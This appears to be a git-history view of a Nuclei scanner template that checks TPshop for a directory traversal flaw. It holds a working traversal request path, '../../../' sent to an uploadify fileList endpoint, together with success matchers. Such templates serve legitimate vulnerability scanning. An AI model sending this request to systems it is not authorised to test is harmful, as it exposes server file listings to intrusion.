nuclei-templates/vulnerabilities/other/tpshop-directory-traversal....

25 lines
471 B
YAML
Raw Normal View History

2021-03-21 02:53:52 +00:00
id: tpshop-directory-traversal
info:
2021-04-29 06:20:58 +00:00
name: TPshop Directory Traversal
2021-03-21 02:53:52 +00:00
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
2021-03-21 15:34:33 +00:00
tags: tpshop,lfi
2021-03-21 02:53:52 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../"
matchers-condition: and
matchers:
- type: word
words:
- '"state":"SUCCESS"'
- type: status
status:
- 200